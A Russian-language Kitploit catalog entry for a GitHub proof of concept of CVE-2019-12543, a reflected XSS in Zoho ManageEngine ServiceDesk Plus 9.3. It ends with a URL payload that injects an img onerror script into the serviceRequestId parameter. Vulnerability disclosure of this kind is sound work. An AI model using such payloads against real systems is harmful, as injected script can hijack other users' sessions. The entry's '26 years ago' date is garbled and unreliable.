Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-12543 — Эксплойт XSS для Zoho ManageEngine ServiceDesk Plus 9.3 через параметр serviceRequestId в PurchaseRequest.do, демонстрирующий уязвимость отражённого межсайтового скриптинга. | Kitploit
Инструменты/GitHubGitHub/tarantula-team/cve-2019-12543
Анализ уязвимостейЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubtarantula-team/cve-2019-12543

CVE-2019-12543

Эксплойт XSS для Zoho ManageEngine ServiceDesk Plus 9.3 через параметр serviceRequestId в PurchaseRequest.do, демонстрирующий уязвимость отражённого межсайтового скриптинга.

Репозиторий
26 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-12543 Zoho ManageEngine ServiceDesk Plus 9.3 XSS уязвимость в PurchaseRequest.do

Информация Описание: Проблема была обнаружена в Zoho ManageEngine ServiceDesk Plus 9.3. Существует XSS через параметр serviceRequestId в PurchaseRequest.do.

Автор: Concobe из Tarantula Team - VinCSS (член Vingroup)

Полезная нагрузка

domain/PurchaseRequest.do?operation=getAssociatedPrsForSR&serviceRequestId=1%3Cimg%20src%3da%20onerror%3dalert(%27XSS%27)%3E1

Скачать инструмент